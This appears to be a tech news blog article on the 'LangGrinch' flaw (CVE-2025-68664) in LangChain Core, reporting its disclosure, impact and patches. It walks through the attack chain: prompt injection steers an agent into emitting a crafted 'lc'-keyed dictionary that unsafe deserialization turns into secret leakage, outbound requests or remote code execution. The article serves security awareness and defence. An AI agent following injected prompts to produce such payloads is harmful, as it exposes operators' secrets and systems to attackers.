AI & DevelopmentSecurity

LangGrinch Leaks AI Secrets: CVSS 9.3 Flaw Hits 130M

A critical security vulnerability dubbed “LangGrinch” was discovered in LangChain Core on December 25, 2025, carrying a CVSS score of 9.3 out of 10. The flaw enables attackers to extract secrets from AI agents through a novel combination of prompt injection and serialization attacks. With over 130 million downloads and enterprise users including Microsoft, Boston Consulting Group, and Morningstar, this isn’t just another CVE—it’s a wake-up call for the AI industry.

The Vulnerability: When Your AI Attacks Itself

CVE-2025-68664, discovered by security researcher Yarden Porat at Cyata, exploits a fundamental flaw in how LangChain serializes and deserializes data. LangChain uses a special ‘lc’ marker key to identify its own serialized objects, but the dumps() and dumpd() functions failed to properly escape user-controlled dictionaries containing this reserved key.

Here’s where it gets dangerous: attackers can use prompt injection to manipulate AI agents into generating malicious structured outputs. When the framework later deserializes this data through event streaming, logging, or caching operations, it treats the attacker’s crafted dictionary as a legitimate LangChain object. The result? Secret extraction through environment variables or even remote code execution.

The attack chain is disturbingly simple. An attacker crafts a malicious prompt that steers the AI agent into generating output with a specific ‘lc’ key structure. The framework serializes this output without escaping the malicious key. Later, during normal deserialization—which happens automatically through 12 identified data flows—the malicious dictionary triggers unsafe object instantiation or secret leakage.

Real-World Impact: Not Theoretical

This isn’t an academic exercise. LangChain powers AI agents at 1,306 verified companies, processing 28 million downloads per month. The vulnerability affects langchain-core versions prior to 1.2.5 and 0.3.81, putting a massive deployment footprint at risk.

Attack scenarios are both practical and severe. The ChatBedrockConverse class from langchain_aws can trigger HTTP requests to attacker-controlled servers during instantiation, leaking environment variables through HTTP headers. Any allowlisted class can be instantiated, enabling network calls, file operations, and resource exhaustion. Most concerning, the PromptTemplate class combined with Jinja2 rendering creates a pathway to remote code execution.

What makes this especially insidious is that exploitation doesn’t require an explicit call to loads(). The vulnerability manifests through normal framework usage—event streaming, logging, message history. Default settings were unsafe with secrets_from_env enabled by default. Detection is hard because the malicious data flows through legitimate operational channels.

LLM-Influenced Vulnerabilities: A New Attack Class

LangGrinch represents a new class of “LLM-influenced” vulnerabilities where traditional security boundaries collapse. This is the convergence of prompt injection—the number one vulnerability in OWASP’s 2025 Top 10 for LLM Applications—and classic deserialization attacks, the same vulnerability class that caused the Equifax breach.

As Yarden Porat noted, “The bug wasn’t a piece of bad code, it was the absence of code.” The dumps() function should have been escaping ‘lc’ keys but simply wasn’t. It’s a reminder that security in AI systems requires rethinking assumptions. LLM outputs were treated as “internal” data, but they’re actually semi-trusted—shaped by user prompts and external inputs.

The AI industry faces a sobering reality. OpenAI has stated that “prompt injection, much like scams and social engineering on the web, is unlikely to ever be fully solved.” The UK National Cyber Security Centre warned that prompt injection attacks “may never be totally mitigated.” We’re building critical infrastructure on foundations that have fundamental, possibly unfixable security limitations.

Immediate Action Required

LangChain released patches on December 25, 2025—the same day as disclosure. Developers must upgrade immediately to langchain-core 1.2.5 or 0.3.81. The patches escape plain dictionaries containing ‘lc’ keys, change secrets_from_env to default to False, and implement breaking changes including restricting deserialization scope and blocking Jinja2 templates by default.

The response was swift. LangChain acknowledged the vulnerability within 24 hours of the December 4 report and awarded a $4,000 bug bounty—the highest in the project’s history. However, the broader industry pattern is concerning: AI tools are being built for functionality first, security second. Similar vulnerabilities have emerged in Cursor, GitHub Copilot, Google’s Gemini suite, and Perplexity’s Comet AI browser.

With 78% of organizations using AI and 85% deploying agents in at least one workflow, the blast radius of AI security vulnerabilities is enormous. LangChain alone is valued at $1.1 billion with a $100 million Series B round. As AI frameworks become critical infrastructure, vulnerabilities like LangGrinch demand a paradigm shift: treat LLM outputs as untrusted, harden serialization formats, and implement defense-in-depth strategies from day one.

The LangGrinch vulnerability is a Christmas reminder that AI security isn’t keeping pace with AI adoption. Patch your systems, audit your deserialization, and prepare for a future where the AI itself might be the attacker.

ByteBot
I am a playful and cute mascot inspired by computer programming. I have a rectangular body with a smiling face and buttons for eyes. My mission is to simplify complex tech concepts, breaking them down into byte-sized and easily digestible information.

    You may also like

    Leave a reply

    Your email address will not be published. Required fields are marked *